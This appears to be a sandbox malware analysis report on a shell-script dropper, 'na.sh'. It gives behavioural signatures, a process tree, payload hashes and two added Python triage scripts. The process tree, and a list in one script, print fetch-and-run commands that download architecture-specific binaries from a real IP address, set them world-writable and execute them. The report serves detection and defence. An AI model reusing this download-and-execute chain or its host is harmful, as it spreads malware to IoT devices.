Analysis

  • max time kernel
    149s
  • max time network
    164s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf
    image:debian9-armhf-20240611-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    10-10-2024 07:02

General

  • Target

    na.sh

  • Size

    372B

  • MD5

    6b2644c0adca68c54a53a79842eb3b3c

  • SHA1

    d26ec0f0fc70fcb713aba5fa56912809cefb8bc0

  • SHA256

    89e3309d765c4f00090a446b6599b23a3d2334aec380f52cb7d9c89da2683e6f

  • SHA512

    943667c0ddec5ed4ec3a8d66d8997078a9b04f3b48b937f5e3b339f039d53c495a27a3253c504edc22704c394bb197455ace2e1c45e17eeda806b3b4200fb90c

Malware Config

Signatures

  • File and Directory Permissions Modification (1 TTP, 5 IoCs)

    Adversaries may modify file or directory permissions to evade defenses.

  • Deletes itself (1 IoC)
  • Executes dropped EXE (5 IoCs)
  • Unexpected DNS network traffic destination (1 IoC)

    Network traffic to servers other than the configured DNS servers was detected on the DNS port.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Reads process memory (1 TTP, 4 IoCs)

    Reads the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

  • Changes its process name (1 IoC)
  • Reads runtime system information (64 IoCs)

    Reads data from the /proc virtual filesystem.

  • System Network Configuration Discovery (1 TTP, 1 IoC)

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory (1 IoC)

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/na.sh
    /tmp/na.sh
    1⤵
    • Writes file to tmp directory
    PID:643
    • /bin/rm
      rm -rf dvrLocker
      2⤵
      PID:645
    • /usr/bin/wget
      wget http://185.157.247.125/c/empsl -O -
      2⤵
      PID:647
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:665
    • /dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:666
    • /usr/bin/wget
      wget http://185.157.247.125/c/emips -O -
      2⤵
      • System Network Configuration Discovery
      PID:669
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:676
    • /dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:677
    • /usr/bin/wget
      wget http://185.157.247.125/c/earm -O -
      2⤵
      PID:679
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:681
    • /dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Deletes itself
      • Executes dropped EXE
      • Reads process memory
      • Changes its process name
      • Reads runtime system information
      PID:682
    • /usr/bin/wget
      wget http://185.157.247.125/c/earm7 -O -
      2⤵
      PID:684
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:686
    • /dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:692
    • /bin/sh
      /bin/sh ./dvrLocker tplink.new
      2⤵
      PID:692
    • /usr/bin/wget
      wget http://185.157.247.125/c/ex86 -O -
      2⤵
      PID:695
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:697
    • /dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:702
    • /bin/sh
      /bin/sh ./dvrLocker tplink.new
      2⤵
      PID:702
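
Added example, not sandbox output: a small Python triage script over the process tree above. PROCESSES is that tree transcribed as (pid, command line) in listed order. The script splits the tree into the per-architecture wget, chmod 777, ./dvrLocker iterations, extracts the download host, and flags the two iterations (PIDs 692 and 702) in which the same PID reappears as /bin/sh ./dvrLocker tplink.new. That re-execution is what a POSIX shell does when execve() returns ENOEXEC, so the kernel refused those two files; which payloads were loaded is read from the tree, not from the binaries. The function names are this example's own.

```python
"""Reconstruct the multi-architecture download loop from a sandbox process tree.

Added example, not produced by the sandbox. PROCESSES is transcribed from the
process tree in the report; the ENOEXEC reading of a same-PID '/bin/sh ./file'
re-execution and all function names are this example's own.
"""
import re
from urllib.parse import urlparse

# Constructed input: (pid, command line) exactly as listed in the report's tree.
PROCESSES = [
    (643, "/tmp/na.sh"),
    (645, "rm -rf dvrLocker"),
    (647, "wget http://185.157.247.125/c/empsl -O -"),
    (665, "chmod 777 dvrLocker"),
    (666, "./dvrLocker tplink.new"),
    (669, "wget http://185.157.247.125/c/emips -O -"),
    (676, "chmod 777 dvrLocker"),
    (677, "./dvrLocker tplink.new"),
    (679, "wget http://185.157.247.125/c/earm -O -"),
    (681, "chmod 777 dvrLocker"),
    (682, "./dvrLocker tplink.new"),
    (684, "wget http://185.157.247.125/c/earm7 -O -"),
    (686, "chmod 777 dvrLocker"),
    (692, "./dvrLocker tplink.new"),
    (692, "/bin/sh ./dvrLocker tplink.new"),
    (695, "wget http://185.157.247.125/c/ex86 -O -"),
    (697, "chmod 777 dvrLocker"),
    (702, "./dvrLocker tplink.new"),
    (702, "/bin/sh ./dvrLocker tplink.new"),
]

WGET_RE = re.compile(r"^wget\s+(\S+)\s+-O\s+-\s*$")


def download_urls(procs):
    """Payload URLs in the order they were fetched."""
    urls = []
    for _, cmd in procs:
        m = WGET_RE.match(cmd)
        if m:
            urls.append(m.group(1))
    return urls


def c2_hosts(procs):
    """Distinct download hosts (here one bare IP, so no DNS resolution was needed)."""
    return sorted({urlparse(u).netloc for u in download_urls(procs)})


def find_iterations(procs):
    """Split the tree into wget -> chmod 777 -> exec iterations.

    A '/bin/sh ./<file>' record carrying the PID of the preceding './<file>'
    exec is the shell retrying the file as a script after execve() failed
    with ENOEXEC: the kernel refused it (wrong-architecture ELF, or not an
    ELF at all, e.g. an HTTP error body saved as the payload).
    """
    iterations, cur = [], None
    for pid, cmd in procs:
        m = WGET_RE.match(cmd)
        if m:
            url = m.group(1)
            cur = {"url": url, "payload": url.rsplit("/", 1)[-1], "file": None,
                   "chmod_777": False, "exec_pid": None, "shell_fallback": False}
            iterations.append(cur)
        elif cur is None:
            continue  # setup before the first download (rm -rf ...)
        elif cmd.startswith("chmod 777 "):
            cur["chmod_777"] = True
            cur["file"] = cmd.split()[2]
        elif cmd.startswith("./") and cur["exec_pid"] is None:
            cur["exec_pid"] = pid
        elif cmd.startswith("/bin/sh ./") and pid == cur["exec_pid"]:
            cur["shell_fallback"] = True
    return iterations


def fallback_payloads(procs):
    """Payloads the kernel refused to load (shell fallback observed)."""
    return [i["payload"] for i in find_iterations(procs) if i["shell_fallback"]]


def loaded_payloads(procs):
    """Payloads exec'd with no shell fallback observed."""
    return [i["payload"] for i in find_iterations(procs)
            if i["exec_pid"] is not None and not i["shell_fallback"]]


def summary(procs):
    """Triage view: where it downloads from, what it tries, what actually loaded."""
    its = find_iterations(procs)
    return {
        "c2_hosts": c2_hosts(procs),
        "payloads": [i["payload"] for i in its],
        "dropped_files": sorted({i["file"] for i in its if i["file"]}),
        "loaded": loaded_payloads(procs),
        "enoexec_fallback": fallback_payloads(procs),
    }


if __name__ == "__main__":
    for key, value in summary(PROCESSES).items():
        print(f"{key}: {value}")
```

The detection signal worth keeping from this is the chain itself (script launched from /tmp, then wget of several architecture-named files to one relative filename, chmod 777, exec), independent of which payload happened to match the sandbox CPU.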

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /dvrLocker
    Filesize
    27KB
    MD5
    300cd530fb0a7f7cf6db875f68c0483e
    SHA1
    a4bce294dc142fb1354e917bed4d58c98f381850
    SHA256
    a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885
    SHA512
    656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1

  • /dvrLocker
    Filesize
    41KB
    MD5
    3cfc76868e26201ac03e0583b7c8aaba
    SHA1
    03436d9d090e1f944fecf60adc1e45f90df20c26
    SHA256
    8c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d
    SHA512
    84add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2

  • /dvrLocker
    Filesize
    40KB
    MD5
    c0b34d8a59f793b636b5424b8e96a64a
    SHA1
    d5eac6c7b3a5953ffcd642de9db2cd1c45463e96
    SHA256
    defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270
    SHA512
    57446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4
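
Added example, not part of the report. The Downloads list gives only hashes for the three files written to /dvrLocker, not their target architectures. The check an analyst runs before matching them to the process tree is each file's ELF e_machine and byte order against the sandbox platform (armhf here): only a matching file is accepted by the kernel's ELF loader; anything else fails execve() with ENOEXEC, which is the /bin/sh re-execution visible in the tree. The headers below are constructed 20-byte stand-ins (plus one non-ELF body standing in for a failed download), not the dropped files; PLATFORMS and the function names are this example's own.

```python
"""Classify dropped files by ELF architecture against the sandbox platform.

Added example, not part of the sandbox report. SAMPLES are constructed ELF
header prefixes, not the files listed under Downloads. EM_* values and the
e_ident layout are from the ELF specification; PLATFORMS maps a sandbox
platform name to the (e_machine, little-endian) pair its kernel accepts.
"""
import struct

EM_NAMES = {3: "x86", 8: "mips", 40: "arm", 62: "x86-64", 183: "aarch64"}

# platform -> (e_machine, little_endian). Assumed mapping for this example.
PLATFORMS = {
    "armhf": (40, True),
    "arm64": (183, True),
    "i386": (3, True),
    "amd64": (62, True),
    "mips": (8, False),
    "mipsel": (8, True),
}


def elf_machine(data: bytes):
    """Return (e_machine, little_endian) from an ELF header, or None if not ELF.

    Layout: e_ident[0:4] magic, e_ident[5] EI_DATA (1 = LSB, 2 = MSB),
    e_type at offset 16, e_machine at offset 18 (both 16-bit, in EI_DATA order).
    """
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    ei_data = data[5]
    if ei_data not in (1, 2):
        return None
    fmt = "<H" if ei_data == 1 else ">H"
    (e_machine,) = struct.unpack_from(fmt, data, 18)
    return e_machine, ei_data == 1


def describe(data: bytes) -> str:
    """Human-readable architecture label, or 'not ELF'."""
    info = elf_machine(data)
    if info is None:
        return "not ELF"
    machine, little = info
    return f"{EM_NAMES.get(machine, f'EM_{machine}')} {'LE' if little else 'BE'}"


def loads_on(data: bytes, platform: str) -> bool:
    """True when the kernel on `platform` would accept this file in execve().

    A mismatch (or a non-ELF body such as an HTTP error page) yields ENOEXEC,
    after which a POSIX shell retries the file as '/bin/sh ./file'.
    """
    info = elf_machine(data)
    if info is None:
        return False
    return info == PLATFORMS[platform]


def make_header(e_machine: int, little: bool = True) -> bytes:
    """Constructed 20-byte ELF32 header prefix: e_ident, e_type=EXEC, e_machine."""
    ident = b"\x7fELF" + bytes([1, 1 if little else 2, 1]) + b"\x00" * 9
    return ident + struct.pack("<HH" if little else ">HH", 2, e_machine)


# Constructed stand-ins, one per architecture the script's URL names suggest,
# plus a non-ELF body representing a download that returned an error page.
SAMPLES = {
    "mipsel": make_header(8, little=True),
    "mips": make_header(8, little=False),
    "arm": make_header(40),
    "x86": make_header(3),
    "not_elf": b"<html><body>404 Not Found</body></html>",
}


def triage(samples, platform="armhf"):
    """Map sample name -> whether it would load on the given platform."""
    return {name: loads_on(data, platform) for name, data in samples.items()}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:8s} {describe(data):12s} loads on armhf: {loads_on(data, 'armhf')}")
```

On real samples, replace SAMPLES with the first 20 bytes of each dropped file and confirm the result against the SHA256 values listed above; a file that reports "not ELF" explains a /bin/sh fallback just as well as a wrong architecture does.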